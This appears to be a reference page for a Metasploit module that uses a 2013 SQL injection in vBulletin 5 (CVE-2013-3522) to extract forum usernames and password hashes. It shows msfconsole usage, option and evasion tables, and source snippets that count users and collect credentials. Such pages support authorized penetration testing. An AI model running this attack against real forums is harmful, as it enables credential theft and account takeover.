vBulletin Password Collector via nodeid SQL Injection - Metasploit


This page contains detailed information about how to use the auxiliary/gather/vbulletin_vote_sqli metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: vBulletin Password Collector via nodeid SQL Injection
Module: auxiliary/gather/vbulletin_vote_sqli
Source code: modules/auxiliary/gather/vbulletin_vote_sqli.rb
Disclosure date: 2013-03-24
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2013-3522

This module exploits a SQL injection vulnerability found in vBulletin 5 that has been used in the wild since March 2013. This module can be used to extract the web application's usernames and hashes, which could be used to authenticate into the vBulletin admin control panel.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/gather/vbulletin_vote_sqli
msf auxiliary(vbulletin_vote_sqli) > show targets
    ... a list of targets ...
msf auxiliary(vbulletin_vote_sqli) > set TARGET target-id
msf auxiliary(vbulletin_vote_sqli) > show options
    ... show and set options ...
msf auxiliary(vbulletin_vote_sqli) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the gather/vbulletin_vote_sqli auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/vbulletin_vote_sqli

msf6 auxiliary(gather/vbulletin_vote_sqli) > show info

       Name: vBulletin Password Collector via nodeid SQL Injection
     Module: auxiliary/gather/vbulletin_vote_sqli
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2013-03-24

Provided by:
  Orestis Kourides
  sinn3r <[email protected]>
  juan vazquez <[email protected]>

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  MAXNODE    100              yes       Valid Node ID
  MINNODE    1                yes       Valid Node ID
  NODE                        no        Valid Node ID
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The path to vBulletin
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a SQL injection vulnerability found in 
  vBulletin 5 that has been used in the wild since March 2013. This 
  module can be used to extract the web application's usernames and 
  hashes, which could be used to authenticate into the vBulletin admin 
  control panel.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2013-3522
  OSVDB (92031)
  https://www.exploit-db.com/exploits/24882
  http://www.securityfocus.com/bid/58754
  http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt

Module Options


This is a complete list of options available in the gather/vbulletin_vote_sqli auxiliary module:

msf6 auxiliary(gather/vbulletin_vote_sqli) > show options

Module options (auxiliary/gather/vbulletin_vote_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   MAXNODE    100              yes       Valid Node ID
   MINNODE    1                yes       Valid Node ID
   NODE                        no        Valid Node ID
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to vBulletin
   VHOST                       no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the gather/vbulletin_vote_sqli auxiliary module:

msf6 auxiliary(gather/vbulletin_vote_sqli) > show advanced

Module advanced options (auxiliary/gather/vbulletin_vote_sqli):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the gather/vbulletin_vote_sqli module can do:

msf6 auxiliary(gather/vbulletin_vote_sqli) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the gather/vbulletin_vote_sqli auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/vbulletin_vote_sqli) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

MINNODE can't be major than MAXNODE


Here is a relevant code snippet related to the "MINNODE can't be major than MAXNODE" error message:

57:	  def brute_force_node
58:	    min = datastore["MINNODE"]
59:	    max = datastore["MAXNODE"]
60:	
61:	    if min > max
62:	      print_error("MINNODE can't be major than MAXNODE")
63:	      return nil
64:	    end
65:	
66:	    for node_id in min..max
67:	      if exists_node?(node_id)

node id not found


Here is a relevant code snippet related to the "node id not found" error message:

171:	
172:	  def run
173:	    print_status("Checking for a valid node id...")
174:	    node_id = get_node
175:	    if node_id.nil?
176:	      print_error("node id not found")
177:	      return
178:	    end
179:	
180:	    print_good("Using node id #{node_id} to exploit sqli... Counting users...")
181:	    data = do_sqli(node_id, "select count(*) from user")

Error exploiting sqli


Here is a relevant code snippet related to the "Error exploiting sqli" error message:

178:	    end
179:	
180:	    print_good("Using node id #{node_id} to exploit sqli... Counting users...")
181:	    data = do_sqli(node_id, "select count(*) from user")
182:	    if data.blank?
183:	      print_error("Error exploiting sqli")
184:	      return
185:	    end
186:	    count_users = data.to_i
187:	    print_good("#{count_users} users found. Collecting credentials...")
188:	

Unfortunately the module was unable to extract any credentials


Here is a relevant code snippet related to the "Unfortunately the module was unable to extract any credentials" error message:

209:	
210:	    if users_table.rows.length > 0
211:	      print_good("#{users_table.rows.length.to_s} credentials successfully collected")
212:	      print_line(users_table.to_s)
213:	    else
214:	      print_error("Unfortunately the module was unable to extract any credentials")
215:	    end
216:	  end
217:	
218:	
219:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Orestis Kourides
  • sinn3r
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.1.33-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.